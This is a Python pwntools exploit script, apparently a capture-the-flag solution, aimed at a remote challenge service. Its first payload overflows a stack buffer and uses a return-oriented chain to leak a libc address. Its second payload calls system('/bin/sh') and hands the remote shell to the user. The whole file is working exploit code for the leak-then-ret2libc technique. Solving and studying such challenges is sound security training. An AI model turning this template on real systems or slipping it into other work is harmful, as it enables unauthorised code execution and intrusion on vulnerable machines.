from pwn import *

# Padding length placed in front of the first return address in each payload
# (stage 1 uses this name; stage 2 repeats the literal 24).
offset = 24
# Local copy of the target's libc; its symbol table supplies the puts/system
# offsets that convert the leaked puts address into a libc base.
libc = ELF("./libc.so.6")
#r = process("./baby2")
r = remote("baby-01.pwn.beer",10002)
# Gadget, GOT and PLT addresses are hard-coded absolute values, so the target
# binary is presumably built without PIE -- TODO confirm against the binary.
pop_rdi = 0x0000000000400783
# printf_got / printf_plt are defined but not referenced anywhere below.
printf_got = 0x000000601fd0
puts_got = 0x000000601fc8
printf_plt = 0x0000000000400560
puts_plt = 0x0000000000400550
# Returning here after the leak restarts the vulnerable function for stage 2.
main = 0x0000000000400698
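def un64(data):
    """Decode *data* as a little-endian unsigned integer.

    Equivalent to the original ``int(data[::-1].encode("hex"), 16)``, but
    implemented with :mod:`binascii` so it accepts ``bytes`` on Python 3 as
    well as ``str`` on Python 2 (``str.encode("hex")`` does not exist on
    Python 3). Inputs shorter than 8 bytes are accepted, as before (the
    caller strips newline bytes from the received value first).

    Args:
        data: raw little-endian bytes, e.g. the value received from the
            target after the leak.

    Returns:
        The integer value of ``data`` interpreted as little-endian.

    Raises:
        ValueError: if ``data`` is empty (``int("", 16)``), exactly as the
            original helper did.
    """
    import binascii  # local import keeps the module's top level unchanged

    # Reverse the byte order, hex-encode, then parse as a base-16 integer.
    return int(binascii.hexlify(data[::-1]), 16)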
# Stage 1 (leak): `offset` bytes of padding, then a chain that calls
# puts(puts_got) via the PLT so the target prints its resolved puts address,
# and finally returns into main so a second payload can be sent.
p = "a" * offset
p += p64(pop_rdi)
p += p64(puts_got)
p += p64(puts_plt)
p += p64(main)
#r.recvuntil("input: ")
#gdb.attach(r)
r.sendlineafter("input: ",p)
# Read up to 8 bytes of the printed address, drop newline bytes, and decode
# little-endian.
puts_leak = un64(r.recv(8).replace("\n",""))
log.info("leaking libc puts@got : " + hex(puts_leak))
# Rebase libc from the leaked puts address using the local libc's symbol
# table, then derive system and a "/bin/sh" string address from that base.
libc_base = puts_leak - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + libc.search("/bin/sh").next()
# Commented-out alternative: fixed offsets instead of the symbol lookup.
#libc_base = puts_leak - 0x0809c0
#system = libc_base - 0x31580
#binsh = libc_base + 0x1334da
# Stage 2 (ret2libc): same padding length as `offset` (literal 24 here),
# then system("/bin/sh"). The trailing 8 filler bytes are not explained in
# the script -- presumably padding/alignment, TODO confirm.
p2 = "A" * 24
p2 += p64(pop_rdi)
p2 += p64(binsh)
p2 += p64(system)
p2 += "A"*8
log.info("binsh at : " + hex(binsh))
log.info("system at : " + hex(system))
log.info("libc_base at : " + hex(libc_base))
#r.recvuntil("input: ")
r.sendlineafter("input: ",p2)
# Hand the connection over to the user once the second payload is sent.
r.interactive()